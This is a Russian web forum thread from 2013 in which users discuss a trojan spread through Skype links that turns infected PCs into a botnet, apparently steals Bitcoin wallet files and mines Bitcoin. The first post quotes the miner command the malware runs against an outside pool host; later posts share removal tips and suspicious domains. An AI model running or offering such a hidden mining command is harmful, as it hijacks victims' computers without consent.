Новый skype-троян превращает компьютер в раба, добывающего Bitcoin

(Ответов: 14, Просмотров: 3584)
Страница 1 из 2 12 Последняя
  1. Разработка любых сайтов Аватар для ArhStrAngeR
    • Регистрация: 08.06.2011
    • Сообщений: 3,376
    • Записей в дневнике: 1
    • Репутация: 2506
    В блоге Дмитрия Бестужева, эксперта «Лаборатории Касперского», несколько дней назад появилось сообщение о массированной компании по распространению в skype нового трояна. Пользователям рассылаются сообщения, предлагающие перейти по некой ссылке вида:
    www.goo.gl/XXXXX?image=IMG0540250-JPG
    По состоянию на 4 апреля интенсивность перехода по ней составляла почти 3 клика в секунду, а общее число кликов — около 170к!
    Большая часть жертв — из России и Украины:



    Так же затронуты пользователи из Китая, Италии, Болгарии и Тайваня.
    Сам троян написан на Visual Basic и так же способен распространяться через USB-накопители. После инфицирования, компьютер жертвы становится частью ботнета, используя для связи с командным сервером IRC протокол.
    Кроме того, троян, похоже, ворует файл wallet.dat от Bitcoin кошелька:



    В своём следующем посте, Дмитрий рассказал про аналогичную компанию, но распространяющую троян немного другого рода. Оказавшись на машине пользователя, он запускает команду:

    bitcoin-miner.exe -a 60 -l no -o http://suppp.cantvenlinea.biz:1942/ -u XXXXXX0000001@gmail.com -p XXXXXXXX

    Таким образом, заставляя ваш компьютер добывать биткоины для злоумышленника!
    При этом, нагрузка на CPU значительно возрастает:



    Пруф
    Последний раз редактировалось ArhStrAngeR; 07.04.2013 в 13:15.
    • 15

    Спасибо сказали:

    Adiofilms(08.04.2013), ADvi(07.04.2013), AlexLeo(07.04.2013), Asin(07.04.2013), astass(14.12.2013), Cyberflow(07.04.2013), Gaya(25.04.2013), Inforation(08.04.2013), Servent-of-Inos(07.04.2013), TbIKBA(08.04.2013), zampug(07.04.2013), Zzorge(07.04.2013), Вадим(08.04.2013), Демиург(08.04.2013), Левша(25.04.2013),
  2. Опытный Аватар для AlexLeo
    • Регистрация: 30.10.2011
    • Сообщений: 327
    • Репутация: 66
    • Webmoney BL: ?
    4 дня назад от одного знакомого пришло такое сообщение, типа куча картинок на передачу... Начал качать, ладно Avast начал ругаться - сразу понял что вирус.
    Блог, просто блог... http://alex-leo.ru
    ❤JOOMLA
    • 0
  3. Banned
    • Регистрация: 14.03.2012
    • Сообщений: 377
    • Репутация: 158
    Поймал этот вирус от своих форумчан, так как мне часто кидают скрины кейсов или статистики, но потом пришлось его полностью удалить. Антивирус тут не поможет поможет, а для тех кто хочет избавиться вот FAQ

    http://www.youtube.com/watch?v=g26upLDKw98

    п.с
    Видео снял школьник, но действительно все что он описал убило вирус. Я человек далекий от техники поэтому руководствовался этим видео.
    • 6

    Спасибо сказали:

    altezzik(11.04.2013), ArhStrAngeR(07.04.2013), Cyberflow(07.04.2013), Gaya(25.04.2013), Zzorge(07.04.2013), Демиург(08.04.2013),
  4. Где бабло? Аватар для Cyberflow
    • Регистрация: 14.12.2010
    • Сообщений: 502
    • Репутация: 191
    • Webmoney BL: ?
    Так же столкнулся с данным трояном - Пруф
    Благо аваст предупредил.
    • 0
  5. Опытный
    • Регистрация: 08.03.2013
    • Сообщений: 460
    • Репутация: 122
    Cyberflow, Так же столкнулся с данным трояном - Пруф
    Надеюсь это ссылка не на страницу с трояном, а на его описание? Аваста у меня нету, заходить безопасно туда можно?
    • 0
  6. Где бабло? Аватар для Cyberflow
    • Регистрация: 14.12.2010
    • Сообщений: 502
    • Репутация: 191
    • Webmoney BL: ?
    Цитата Сообщение от WebPrib Посмотреть сообщение
    Надеюсь это ссылка не на страницу с трояном, а на его описание? Аваста у меня нету, заходить безопасно туда можно?
    Нет, эта ссылка на скриншот сообщения в скайпе.
    • 0
  7. Дипломник Аватар для kostya.ast
    • Регистрация: 08.03.2012
    • Сообщений: 149
    • Репутация: 9
    Недавно были сообщения в скайпе такие, но я как обычно забил на них
    • 0
  8. Студент Аватар для Unlor
    • Регистрация: 17.02.2012
    • Сообщений: 66
    • Репутация: 18
    Цитата Сообщение от Daddy Cary Посмотреть сообщение
    Видео снял школьник,
    Да уж, совсем школьник)
    Я эту штуку убирал простым cureit, причем полностью и без всяких доп. чисток, только в скайпе контроль доступа чистил руками - ну и судя по тому, что сообщения больше не приходили - помогло.
    • 0
  9. Опытный Аватар для temass
    • Регистрация: 24.11.2010
    • Сообщений: 277
    • Репутация: 49
    вроде ничего не приходило, но я уже готов к встрече)))
    • 0
  10. Сеошнег Аватар для DESTER
    • Регистрация: 15.02.2012
    • Сообщений: 454
    • Репутация: 112
    • Webmoney BL: ?
    Сегодня наткнулся на такую фигню в скайпе: "это мой любимый рис из вас _http://fur.ly/9hnp?foto=<Ваш ник в скайпе>". При переходе грузится архив, в архиве файлик, при запуске которого сам инсталлится плагин к скайпу (без запроса... точнее запрос сам одобряется), далее идет спам подобных ссылок по контакт-листу.
    CureIt не обнаруживает в качестве вируса. Лечение простое: удаляем из процессов, удаляем сам файл, реинсталлим скайп (в таком порядке).
    Замеченные домены: fur.ly bit.ly url9.de ow.ly moourl.com

    Будьте осторожны!
    • 0
Страница 1 из 2 12 Последняя

Похожие темы

Темы Раздел Ответов Последний пост
Установка сервера mysql на домашний компьютер
Web программирование 9 25.02.2013 14:04
Как быстро сохранить фото из сайта на компьютер?
Web программирование 8 18.10.2012 17:07
Cash-File.com - Превращает файлы в деньги
Партнерские программы 0 01.09.2010 21:17

У кого попросить инвайт?

Вы можете попросить инвайт у любого модератора:

Информеры